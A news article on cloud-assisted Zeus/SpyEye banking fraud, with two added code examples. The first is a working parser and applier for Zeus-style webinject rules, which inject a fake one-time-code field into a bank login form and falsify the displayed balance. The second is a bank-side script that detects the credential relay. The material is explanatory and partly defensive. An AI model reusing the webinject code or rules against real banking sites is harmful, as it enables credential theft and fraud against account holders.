Researchers say criminals are moving their malware heavy lifting from end user PCs to servers in the cloud.
The same flexibility and freedom companies get from having their software and services hosted in the cloud is enabling cybercriminals to conduct highly automated online banking theft — without doing much of the necessary information processing on their victims’ own computers.
Security and privacy experts have long worried that criminals would launch attacks on the servers storing data in cloud environments. But a report released this week from McAfee and Guardian Analytics shows that criminals are now using cloud infrastructure itself to get more capability out of their campaigns.
“They are leveraging the cloud,” Brian Contos, senior director of emerging markets at McAfee, said in an interview. “This is the first time we’ve ever seen this.”
What the researchers uncovered was a series of highly sophisticated campaigns designed to siphon money out of high-balance bank accounts in Europe, the U.S. and South America through automated transfers. Like most online consumer bank fraud, the attacks started with a phishing e-mail, typically pretending to be from the victim's bank and urging the recipient to click a link to change the account password. In early versions of the attacks, clicking the link downloaded a Trojan, in this case Zeus or SpyEye, onto the victim's computer. In later versions the malware's heavy lifting has moved to a server, with only a small component left on the PC.
When the victim goes to log into the bank site, the malware uses a so-called Web inject technique to overlay what looks like the bank's Web page in the victim's browser. Behind the scenes, and entirely invisible to the victim, something different is happening: while the victim believes he or she is transferring money from a savings account into a checking account, for instance, the malware is actually transferring whatever amount the criminals specify into an account they control.
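To make the Web inject step concrete, here is a small parser and applier for the text-based "webinjects" configuration format that Zeus, and the SpyEye builds derived from it, read to decide how to rewrite a page. This is an added example, not code from the report or from the malware itself; the rules, the bank URLs and the HTML pages below are constructed for illustration. The first rule adds a fake "card reader code" field to the login form so the second factor can be captured; the second rewrites the displayed balance so the account page the victim sees no longer reflects the transfer.

```python
"""Parser and applier for the Zeus/SpyEye-style "webinjects" config format.

Added example (not from the McAfee/Guardian Analytics report or from the
malware). The rule text, bank URLs and HTML below are constructed for
illustration; the block syntax (set_url / data_before / data_inject /
data_after, each closed by data_end, '*' as a wildcard) follows the
documented Zeus 2.x format.
"""
import re
from fnmatch import fnmatch

# Constructed rule set. Flags after the URL: G = apply to GET, P = apply to POST.
SAMPLE_INJECTS = """\
set_url https://bank.example/login* GP
data_before
<input type="password" name="password"*>
data_end
data_inject
<label>Card reader code</label><input type="text" name="otp">
data_end
data_after
data_end

set_url https://bank.example/accounts* GP
data_before
<td class="balance">
data_end
data_inject
$4,510.22
data_end
data_after
</td>
data_end
"""

BLOCKS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text):
    """Turn the config text into a list of rule dicts."""
    rules, cur, block = [], None, None
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split()
            cur = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "GP"}
            cur.update({b: [] for b in BLOCKS})
            rules.append(cur)
        elif line in BLOCKS:
            block = line
        elif line == "data_end":
            block = None
        elif block is not None and cur is not None:
            cur[block].append(line)
    for r in rules:
        for b in BLOCKS:
            r[b] = "\n".join(r[b])
    return rules


def _wildcard_re(pattern):
    """'*' in data_before/data_after matches any run of characters."""
    return re.compile(re.escape(pattern).replace(r"\*", ".*?"), re.S)


def apply_injects(url, method, html, rules):
    """Rewrite HTML the way the malware does before the browser renders it.

    Text between the data_before and data_after matches is replaced with
    data_inject; with an empty data_after, data_inject is inserted directly
    after the data_before match.
    """
    for r in rules:
        if not fnmatch(url, r["url"]) or method[0].upper() not in r["flags"]:
            continue
        m = _wildcard_re(r["data_before"]).search(html)
        if not m:
            continue
        start = end = m.end()
        if r["data_after"]:
            m2 = _wildcard_re(r["data_after"]).search(html, start)
            if not m2:
                continue
            end = m2.start()
        html = html[:start] + r["data_inject"] + html[end:]
    return html


# Constructed pages standing in for what the bank actually served.
LOGIN_PAGE = ('<form action="/login" method="post">'
              '<input type="text" name="user">'
              '<input type="password" name="password">'
              '<button>Sign in</button></form>')
ACCOUNTS_PAGE = ('<table><tr><td>Savings</td>'
                 '<td class="balance">$12.40</td></tr></table>')


if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_INJECTS)
    print(apply_injects("https://bank.example/login", "GET", LOGIN_PAGE, rules))
    print(apply_injects("https://bank.example/accounts", "GET", ACCOUNTS_PAGE, rules))
```

The rewrite happens in the browser process after TLS has been stripped, which is why the padlock and the real bank hostname stay intact and why the bank's own page is, from the server's point of view, delivered unmodified.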
Traditionally, banking malware like this does its processing on the victim's PC. In this case, however, the heavy lifting is done on a server in the cloud, according to Contos. In the operations McAfee and Guardian Analytics uncovered, the servers were located in Eastern European countries, he said, mostly at "bulletproof" ISPs with lax policies, and they are relocated frequently to avoid discovery.
“The servers are sitting within ISPs that are designed specifically to take part in fraud,” he said, adding that the criminals in these campaigns even managed to bypass the two-factor authentication systems commonly used in European consumer online banking. In such systems the consumer not only types a username and password into the site but also inserts a bank card into a special card reader attached to the PC, which supplies additional proof that the legitimate user is accessing the account.
The log-in or authentication “information is taken from the malware (on the PC) and redirected to the server in real time,” Contos said. “That server takes that data and authenticates against the victim’s bank account, all within seconds.”
The servers, at least 60 of which were used in these operations, let the criminals fully automate the attacks, so the attacker needs less manual intervention for tasks such as adjusting the amount stolen to keep it below fraud detection thresholds.
“The server is the brains that does all the transactions in the bank account,” he said. Rather than having the malware residing on the victim’s computer take charge of the attack functions, like stealing the data and sending it off somewhere, the attack itself is performed by the server.
“All the intelligence is sitting on the server side that they are putting in the cloud,” he said. “The criminals don’t have to change anything on the end user side. They can make modifications on the server side. They still have malware on the user’s machine, but it can be smaller and much less intelligent than in the past.”
The malware on the victim’s computer can stay simple and doesn’t need to be updated to change the functionality of the attack; that can be done on the server side. “It’s all designed to make (the attack) scalable and agile,” Contos said. “This also allows criminals to keep attacks alive as long as possible” because there is less activity on the end user’s computer that can be detected.
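From the bank's side, the relay described in the last few paragraphs leaves a signature: the login page is served to the victim's home connection, but the credentials and card-reader code are presented seconds later from a different address (the criminals' server), and a transfer to a previously unseen payee follows within seconds, for an amount sitting just under the review threshold. The script below is an added example of a detection rule over such events; it is not from the report, and the event format, the 10,000 review threshold, the time windows and the sample events are all constructed assumptions.

```python
"""Bank-side detection sketch for the relay pattern described above.

Added example, not from the McAfee/Guardian Analytics report. The event
format, the review threshold, the time windows and the sample events are
constructed assumptions; a real deployment would read these from the
bank's authentication and payment logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed fraud-monitoring threshold: transfers at or above this get manual review.
REVIEW_THRESHOLD = 10000.00
# Login page served to one IP, credentials/OTP then used from another within this window.
RELAY_WINDOW = timedelta(seconds=60)
# "All within seconds": a transfer this soon after authentication is unusually fast for a human.
FAST_TRANSFER_WINDOW = timedelta(seconds=30)

# Constructed sample events: (timestamp, username, event, source IP, details).
# alice's session shows the relay pattern; bob's is an ordinary one for contrast.
SAMPLE_EVENTS = [
    ("2012-06-26T09:00:01", "alice", "page_load", "203.0.113.10", {}),
    ("2012-06-26T09:00:09", "alice", "auth_ok",   "198.51.100.7", {"factor": "card_reader_otp"}),
    ("2012-06-26T09:00:14", "alice", "transfer",  "198.51.100.7", {"amount": 9850.00, "new_payee": True}),
    ("2012-06-26T10:15:00", "bob",   "page_load", "192.0.2.44",   {}),
    ("2012-06-26T10:16:30", "bob",   "auth_ok",   "192.0.2.44",   {"factor": "card_reader_otp"}),
    ("2012-06-26T10:20:05", "bob",   "transfer",  "192.0.2.44",   {"amount": 250.00, "new_payee": False}),
]


def detect_relay_sessions(events, threshold=REVIEW_THRESHOLD, min_signals=2):
    """Return {username: [(code, detail), ...]} for users with at least min_signals hits.

    Codes: ip_mismatch     - OTP/credentials presented from a different IP than the login page went to
           fast_new_payee  - transfer to a never-seen payee within seconds of authentication
           under_threshold - amount in the top 10% below the review threshold
    Any one signal on its own is weak; the relay pattern is the combination.
    """
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_user[ev[1]].append(ev)

    findings = {}
    for user, evs in by_user.items():
        last_page_load = last_auth = None
        reasons = []
        for ts, _, kind, ip, data in evs:
            t = datetime.fromisoformat(ts)
            if kind == "page_load":
                last_page_load = (t, ip)
            elif kind == "auth_ok":
                last_auth = (t, ip)
                if last_page_load and ip != last_page_load[1] and t - last_page_load[0] <= RELAY_WINDOW:
                    gap = int((t - last_page_load[0]).total_seconds())
                    reasons.append(("ip_mismatch",
                                    f"{data.get('factor', 'credentials')} from {ip}, login page served to "
                                    f"{last_page_load[1]} {gap}s earlier"))
            elif kind == "transfer" and last_auth:
                amount = data["amount"]
                if data.get("new_payee") and t - last_auth[0] <= FAST_TRANSFER_WINDOW:
                    reasons.append(("fast_new_payee",
                                    f"transfer of {amount:.2f} to new payee "
                                    f"{int((t - last_auth[0]).total_seconds())}s after auth"))
                if 0.9 * threshold <= amount < threshold:
                    reasons.append(("under_threshold",
                                    f"{amount:.2f} sits just under the {threshold:.2f} review threshold"))
        if len(reasons) >= min_signals:
            findings[user] = reasons
    return findings


if __name__ == "__main__":
    for user, reasons in detect_relay_sessions(SAMPLE_EVENTS).items():
        print(user)
        for code, detail in reasons:
            print(f"  {code}: {detail}")
```

Because the card-reader code is genuine and is used only once, the bank cannot reject it on its own merits; the only observable difference is where and how quickly it is used, which is why the rule keys on origin and timing rather than on the credential itself.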
Contos predicts this is the future of malware operations, much as many online business operations have moved to the cloud to save companies time and resources. Once the malware is on an end user’s computer, criminals can use that computer for a multitude of operations and attacks.
“We will see people repurposing malware for this purpose,” he said. “They will use the install base (of an existing botnet, for example) and ride that wave and set up their own servers” to use the victim computers for theft.